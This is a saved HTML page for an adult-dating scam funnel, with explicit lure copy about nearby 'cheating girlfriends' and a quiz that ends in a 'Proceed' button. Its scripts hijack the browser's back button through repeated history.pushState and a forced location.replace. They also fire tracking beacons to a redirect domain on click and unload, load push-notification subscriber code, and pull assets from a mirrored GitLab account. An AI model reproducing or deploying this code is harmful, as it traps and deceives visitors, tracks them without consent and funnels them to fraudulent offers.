<!DOCTYPE html>
<html lang="en-US"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta charset="UTF-8"><!-- base href="https://cdn-dimi.akamaized.net/" --><script src="6_files/utils.js" async=""></script><script src="https://gl.githack.com/miyako108278/11111111/-/raw/main/firebase-messaging.js" async=""></script><script src="https://gl.githack.com/miyako108278/11111111/-/raw/main/firebase-app.js" async=""></script><script type="text/javascript" async="" src="https://gl.githack.com/miyako108278/11111111/-/raw/main/subscriber.js"></script><script>let imiFinButCbs = [];
let imiFinButCbsCntr = 0;

function imiFinButClickSubscribe(callback) {
  if (typeof callback === "function") {
    imiFinButCbs.push(callback);
    imiFinButCbsCntr += 1;
  }
}

function imiFinButSubscriberDone(evt, target) {
  imiFinButCbsCntr -= 1;
  if (imiFinButCbsCntr <=0 ) {
    target.dispatchEvent(evt);
  }
}

document.addEventListener("DOMContentLoaded", function (){
  let btns = document.getElementsByTagName("a");
  let lI = -1;
  for (let i=0; i<btns.length; i++) {
    if (btns[i].getAttribute("class") !== null && btns[i].getAttribute("class").indexOf("btn-fin") !== -1 && btns[i].getAttribute("href") === "https://rvklk.deilcatedate.com/site/redirectpage?ca=link&sid=274421&hid=478532&hv=odczj630a9aa100093861&r=H4sIAAAAAAAA%2FxTEwQrCMAwG4LfJdU3%2BtU0OwUeRLm5Q52EYBB9fvHxLLBblOLZVIqANtd%2BSHaVBKcVNhcGUcFjvgFFW30acn9zfFK8Z530%2BvKEME44WLFrqqgJgaKe5f6%2FLmZ78x5x%2FAQAA%2F%2F%2Fe4IxJcQAAAA%3D%3D") {
      lI = i;
    } else if (btns[i].getAttribute("class") !== null && btns[i].getAttribute("class").indexOf("btn-fin") !== -1) {
      lI = i;
    } else if (btns[i].getAttribute("href") === "https://rvklk.deilcatedate.com/site/redirectpage?ca=link&sid=274421&hid=478532&hv=odczj630a9aa100093861&r=H4sIAAAAAAAA%2FxTEwQrCMAwG4LfJdU3%2BtU0OwUeRLm5Q52EYBB9fvHxLLBblOLZVIqANtd%2BSHaVBKcVNhcGUcFjvgFFW30acn9zfFK8Z530%2BvKEME44WLFrqqgJgaKe5f6%2FLmZ78x5x%2FAQAA%2F%2F%2Fe4IxJcQAAAA%3D%3D") {
      lI = i;
    }
  }
  if (lI > -1) {
    function imiFinButClick(ev) {
      if (imiFinButCbs.length > 0) {
        let oev = new ev.constructor(ev.type, ev);
        let trgt = ev.target;
        ev.preventDefault();
        ev.stopImmediatePropagation();
        trgt.removeEventListener("click", imiFinButClick);
        for (let i = 0; i < imiFinButCbs.length; i++) {
          imiFinButCbs[i](oev, trgt, imiFinButSubscriberDone);
        }
        setTimeout(function () {
          trgt.dispatchEvent(oev);
        }, 1000);
      }
    }

    btns[lI].addEventListener("click", imiFinButClick);
  }
});
</script><script>function imibb() {
    var sv = {
        'df86699f6130e141': '', '2148702d7c2782df': '', '0f53c12c292fff5b': ''
    };
    var hash = window.location.pathname.replace('/c/', '');
    var url = window.location.protocol + '//' + window.location.host + window.location.pathname;
    if (hash && hash.length > 1 && sv[hash]) {
        url = window.location.protocol + '//' + window.location.host + window.location.pathname.replace('/c/' + hash, '/c/' + sv[hash]);
    }
    var curhref = window.location.href;
    var lquery = window.location.search.replace("?", "").split('&');
    var nquery = "s1=30638&s2=982131&s3=3977339&s5=backuser&click_id=630a921c6c12805482333a87&iexpp=1&j1=1&j9=1".split('&');

    var nquerykeys = [];
    for (var j=0;j<nquery.length;j++) {
        nquerykeys.push(nquery[j].split('=')[0]);
    }

    for (var j=0;j<lquery.length;j++) {
        var tmp = lquery[j].split('=');
        if (nquerykeys.indexOf(tmp[0]) === -1) {
            nquery.push(tmp[0] + "=" + tmp[1]);
        }
    }

    url = url + '?' + nquery.join("&");
    try {
        history.pushState({}, '', url);
        history.pushState({}, '', url);

        window.onpopstate = function (ev) {
            if (ev['state']) {
                window.exit = false;
                if (curhref.indexOf('&iexpp=1') !== -1) {
                    window.exit = true;
                }
                location.replace(url);
            }
        };
    } catch (ex) {
        console.log(ex);
    }
}

!function () {
    var touched = false;
    try {
        chromeVersion = +(new RegExp('Chrome/([0-9]+)').exec(navigator.userAgent)[1]);
    } catch (e) {
        chromeVersion = 0;
    }
    if (chromeVersion >= 75) {
        window.addEventListener('mouseup', function () {
                if (!touched) {
                    touched = true;
                    setTimeout(function () {
                            imibb();
                        }
                        , 0);
                }
            }
        );
        document.addEventListener("DOMContentLoaded", function () {
                document.body.addEventListener('touchend', function (evt) {
                        if (!touched) {
                            touched = true;
                            setTimeout(function () {
                                    imibb();
                                }
                                , 0);
                        }
                    }
                );
                document.body.addEventListener('keydown', function () {
                        if (!touched) {
                            touched = true;
                            setTimeout(function () {
                                    imibb();
                                }
                                , 0);
                        }
                    }
                );
            }
        );
    } else {
        setTimeout(function () {
                imibb();
            }
            , 0);
    }
}
();
</script><script>var pushFinalClick = false;
var _push = {serverUrl:"https://rvklk.deilcatedate.com",urlParams:{sub:"",s1:"30638",s2:"982131",cid:"211", tid:"odczj630a9aa100093861"},sCb: function (s) {
  window.addEventListener('unload', function (e) {
    if (pushFinalClick === false) {
      var url = "https://rvklk.deilcatedate.com/site/redirectpage?ca=link&sid=274421&hid=478532&hv=odczj630a9aa100093861&r=H4sIAAAAAAAA%2FxTEwQrCMAwG4LfJdU3%2BtU0OwUeRLm5Q52EYBB9fvHxLLBblOLZVIqANtd%2BSHaVBKcVNhcGUcFjvgFFW30acn9zfFK8Z530%2BvKEME44WLFrqqgJgaKe5f6%2FLmZ78x5x%2FAQAA%2F%2F%2Fe4IxJcQAAAA%3D%3D";
      if (url.indexOf("?") !== -1) {
        url = url + "&pushclick=1";
      } else {
        url = url + "?pushclick=1";
      }

      if ("function" === typeof navigator.sendBeacon) {
        navigator.sendBeacon(url);
      } else {
        var xhr = new XMLHttpRequest();
        if ("withCredentials" in xhr) {
          xhr.open("GET", url);
          xhr.send();
        } else if ("undefined" != typeof XDomainRequest) {
          xhr = new XDomainRequest();
          xhr.open("GET", url);
          xhr.send();
        }
      }
    }
  });
}};
document.addEventListener("DOMContentLoaded", function () {
  (function (p, u, s, h) {
    p._pcq = p._pcq || [];
    p._pcq.push(['_currentTime', Date.now()]);
    s = u.createElement('script');
    s.type = 'text/javascript';
    s.async = true;
    s.src = _push.serverUrl + '/js/pushjs/1.0.0/subscriber.js';
    h = u.getElementsByTagName('script')[0];
    h.parentNode.insertBefore(s, h);
  })(window, document);

  function updateIsFinalClick(evt, trgt, callback) {
    if ("a" === trgt.tagName.toLowerCase() && "https://rvklk.deilcatedate.com/site/redirectpage?ca=link&sid=274421&hid=478532&hv=odczj630a9aa100093861&r=H4sIAAAAAAAA%2FxTEwQrCMAwG4LfJdU3%2BtU0OwUeRLm5Q52EYBB9fvHxLLBblOLZVIqANtd%2BSHaVBKcVNhcGUcFjvgFFW30acn9zfFK8Z530%2BvKEME44WLFrqqgJgaKe5f6%2FLmZ78x5x%2FAQAA%2F%2F%2Fe4IxJcQAAAA%3D%3D" === trgt.href)  {
      pushFinalClick = true;
    }
    callback(evt, trgt);
  }

  // if (typeof imiFinButClickSubscribe === 'function') {
  //     imiFinButClickSubscribe(updateIsFinalClick);
  // } else {
    document.addEventListener("click", function (e){
      if ("a" === e.target.tagName.toLowerCase() && "https://rvklk.deilcatedate.com/site/redirectpage?ca=link&sid=274421&hid=478532&hv=odczj630a9aa100093861&r=H4sIAAAAAAAA%2FxTEwQrCMAwG4LfJdU3%2BtU0OwUeRLm5Q52EYBB9fvHxLLBblOLZVIqANtd%2BSHaVBKcVNhcGUcFjvgFFW30acn9zfFK8Z530%2BvKEME44WLFrqqgJgaKe5f6%2FLmZ78x5x%2FAQAA%2F%2F%2Fe4IxJcQAAAA%3D%3D" === e.target.href)  {
        pushFinalClick = true;
      }
    });
  // }
});
</script><script>function sclk() {
    var that = this;
    var url = "https://rvklk.deilcatedate.com/site/redirectpage?ca=link&sid=274421&hid=478532&hv=odczj630a9aa100093861&r=H4sIAAAAAAAA%2FxTEwQrCMAwG4LfJdU3%2BtU0OwUeRLm5Q52EYBB9fvHxLLBblOLZVIqANtd%2BSHaVBKcVNhcGUcFjvgFFW30acn9zfFK8Z530%2BvKEME44WLFrqqgJgaKe5f6%2FLmZ78x5x%2FAQAA%2F%2F%2Fe4IxJcQAAAA%3D%3D";
    if (url.indexOf("?") !== -1) {
      url = url + "&ortbclick=1";
    } else {
      url = url + "?ortbclick=1";
    }

    if (typeof navigator.sendBeacon === "function") {
        navigator.sendBeacon(url);
    } else {
        var xhr = new XMLHttpRequest();
        if ("withCredentials" in xhr) {
            xhr.open("GET", url);
            xhr.send();
        } else if (typeof XDomainRequest != "undefined") {
            xhr = new XDomainRequest();
            xhr.open("GET", url);
            xhr.send();
        }
    }
}

function repplace(url) {
  url = url.replace('[s1]', '30638');
  url = url.replace('[s2]', '982131');
  url = url.replace('[tid]', 'odczj630a9aa100093861');

  return url
}

function imosbn(target, ortbWrpId) {
  var timg = /<img[^>]+>/.exec(target);
  var turl = /href\="?([^"\s]+)"?/i.exec(target);
  if (timg.length) {
    $(ortbWrpId).html(repplace(timg[0].replace(/\\/, '')));
    $(ortbWrpId).addClass('visible');
  } else {
    $(ortbWrpId).remove();
  }
  if (turl.length > 1) {
      $(ortbWrpId).on('click', function(){
        $(ortbWrpId).remove();
        var mo = window.open(repplace(turl[1]), "_blank");
        if (mo != null && mo != undefined && mo != false) {
            mo.focus();
            sclk();
        }
      });
  }
}

function rtbCall() {
    var ortbWrpId = '#wrp-id';
    if ($(ortbWrpId).length) {
      $.ajax({
        url: window.location.protocol + '//' + window.location.host + '/ortb',
        dataType: "json",
        type: "POST",
        data: {
            "vid" : "odczj630a9aa100093861",
            "s1s2": "30638_982131_b",
            "s1"  : "30638",
            "s2"  : "982131",
            "ip"  : "156.206.206.189",
            "ua"  : "Mozilla/5.0 (Windows NT 6.1; rv:103.0) Gecko/20100101 Firefox/103.0",
            "dt"  : "DESKTOP",
            "mk"  : "Mozilla",
            "ml"  : "Desktop",
            "os"  : "Windows",
            "osv" : "7",
            "cn"  : "Wired",
            "tt"  : "1",
            "ctr" : "egy",
            "lang": "en",
            "bu"  : "_b"
        },
        success: function (result) {
            if (result !== undefined && result.target !== undefined && result.target !== "") {
                imosbn(result.target, ortbWrpId);
            } else {
              $(ortbWrpId).remove();
            }
        },
        error: function () {
            $(ortbWrpId).remove();
        }
    });
  }
}

document.addEventListener("DOMContentLoaded", rtbCall);
</script><script>var _rup = {
    's': 'https',
    'h': 'rvklk.deilcatedate.com',
    'p': '/site/redirectpage',
    'q': 'ca=link&sid=274421&hid=478532&hv=odczj630a9aa100093861&r=H4sIAAAAAAAA%2FxTEwQrCMAwG4LfJdU3%2BtU0OwUeRLm5Q52EYBB9fvHxLLBblOLZVIqANtd%2BSHaVBKcVNhcGUcFjvgFFW30acn9zfFK8Z530%2BvKEME44WLFrqqgJgaKe5f6%2FLmZ78x5x%2FAQAA%2F%2F%2Fe4IxJcQAAAA%3D%3D'
};</script><title></title><meta name="viewport" content="user-scalable=false, initial-scale=20.0, maximum-scale=20.0">

        <link href="https://cdn-dimi.akamaized.net/images/favicon.ico" rel="icon" type="image/x-icon">
        <meta content="" name="keywords"><meta content="" name="description"><link rel="stylesheet" type="text/css" href="https://gl.githack.com/miyako108278/11111111/-/raw/main/style.css"><link rel="stylesheet" type="text/css" href="https://gitlab.com/miyako108278/11111111/-/blob/main/popup.css"><script type="text/javascript" src="https://gl.githack.com/miyako108278/11111111/-/raw/main/jquery-2.2.4.min.js"></script><script type="text/javascript" src="https://gl.githack.com/miyako108278/11111111/-/raw/main/vegas.js"></script><script type="text/javascript"src="https://gl.githack.com/miyako108278/11111111/-/raw/main/function.js"></script> <script type="text/javascript" src="https://gl.githack.com/miyako108278/11111111/-/raw/main/translates.js"></script><script type="text/javascript" src="https://gl.githack.com/miyako108278/11111111/-/raw/main/tn_pHash.js"></script></head><body style="" class="vegas-container"><div class="vegas-slide vegas-transition-fade vegas-transition-fade-in vegas-transition-fade-out" style="transition: all 1000ms ease 0s;"><div class="vegas-slide-inner vegas-animation-kenburns" style="background-image: url(&quot;https://pbs.twimg.com/media/FbLK1GDUEAAVnXg?format=jpg&name=large?4.jpg&quot;); background-color: rgb(255, 255, 255); background-position: center center; background-size: cover; animation-duration: 4000ms;"></div></div><div class="vegas-slide vegas-transition-fade vegas-transition-fade-in" style="transition: all 1000ms ease 0s;"><div class="vegas-slide-inner vegas-animation-kenburns" style="background-image: url(&quot;https://pbs.twimg.com/media/FbLK1GDUEAAVnXg?format=jpg&name=large?5.jpg&quot;); background-color: rgb(255, 255, 255); background-position: center center; background-size: cover; animation-duration: 4000ms;"></div></div><div class="vegas-overlay"></div><script>  var _rup = {  's': '',  'h': '',  'p': '',  'q': '' };</script><script>  var formData = {  };</script><div class="preloader" style="display: none;"><img src="6_files/logo.png" alt=""></div><div class="main"><div class="stepbox"><img src="https://gitlab.com/miyako108278/11111111/-/raw/main/logo-white.png" alt="" class="logo"><div class="step" style="display: block;"><div class="step__inner"><div class="step__header"><h1 class="stepIntro1Title">Who are you?</h1></div><div class="step__body"><p class="text"><span class="text32">Select your gender</span></p></div><div class="step__footer"><div class="btnbox"><a class="btn btn--accent btn--round go-to-age text33" href="javascript:void(0)" onclick="formData.gender='woman'">I am a woman.</a><a class="btn btn--accent btn--round next text34" href="javascript:void(0)" onclick="formData.gender='man'">I am a man</a></div></div></div></div><div class="step"><div class="step__inner"><div class="step__header"><h1 class="text16">Attention!</h1></div><div class="step__body"><p class="text"><span class="color">
                                                           
                                                                        
                   </span><span class="text17">wants to exchange candid photos with you.</span></p><p class="text text18">You confirm?</p></div><div class="step__footer"><div class="btnbox"><a class="btn btn--accent btn--round next text19" href="javascript:void(0)">Yes</a><a class="btn btn--accent btn--round next text20" href="javascript:void(0)">Not</a></div></div></div></div><div class="step"><div class="step__inner"><div class="step__header"><h6 class="text06">Question #1</h6></div><div class="step__body"><p class="text text07">The
 women on this site are horny cheating girlfriends and single moms 
looking to fuck all the time. It is likely you will see someone you 
know. Do you agree to keep their identity secret?</p></div><div class="step__footer"><div class="btnbox"><a class="btn btn--accent btn--round next text19" href="javascript:void(0)">Yes</a><a class="btn btn--accent btn--round next text20" href="javascript:void(0)">Not</a></div></div></div></div><div class="step"><div class="step__inner"><div class="step__header"><h6 class="text10">Question #2</h6></div><div class="step__body"><p class="text text11">These women have asked us to not allow men that are seeking a "relationship".</p><p class="text text12">They only desire quick sex. Not dating.</p><p class="text text13">Do you agree to this request?</p></div><div class="step__footer"><div class="btnbox"><a class="btn btn--accent btn--round next text19" href="javascript:void(0)">Yes</a><a class="btn btn--accent btn--round next text20" href="javascript:void(0)">Not</a></div></div></div></div><div class="step"><div class="step__inner"><div class="step__header"><h6 class="text21">Question #3</h6></div><div class="step__body"><p class="text text22">Do you agree to use condoms?</p></div><div class="step__footer"><div class="btnbox"><a class="btn btn--accent btn--round next text19" href="javascript:void(0)">Yes</a><a class="btn btn--accent btn--round next text20" href="javascript:void(0)">Not</a></div></div></div></div><div class="step step--age"><div class="step__inner"><div class="step__header"><h6 class="text25">Question #4</h6></div><div class="step__body"><p class="text text26a">What is your age?</p></div><div class="step__footer"><div class="btnbox f-wrap"><a class="btn btn--accent btn--round next" href="javascript:void(0)" onclick="formData.age='18-25'">              18-25                                                                          </a><a class="btn btn--accent btn--round next" href="javascript:void(0)" onclick="formData.age='25-35'">              25-35                                                                          </a><a class="btn btn--accent btn--round next" href="javascript:void(0)" onclick="formData.age='35-45'">              35-45                                                                          </a><a class="btn btn--accent btn--round next" href="javascript:void(0)" onclick="formData.age='45+'">              45+                                                                          </a></div></div></div></div><div class="step"><div class="step__inner"><div class="step__header"><h1 class="text29">Congratulations!</h1></div><div class="step__body"><p class="text text30">Now
 you can look at the list of women in your neighborhood and see their 
pictures. Once again, please keep confidential! Click on the button 
below to continue.</p></div><div class="step__footer"><div class="btnbox"><a class="btn btn--accent btn--round text31 redirect-url-button btn-fin" href="https://www.google.com/?&amp;pHash=oh3y" target="_blank">Proceed</a></div></div></div></div></div></div><div class="progress"><div class="bar"></div></div><!--crumbs--><!--bg--><img src="https://pbs.twimg.com/media/FbLK1GDUEAAVnXg?format=jpg&name=large?1.jpg" alt="" id="path" style="display: none"><script> </script>
</body></html>
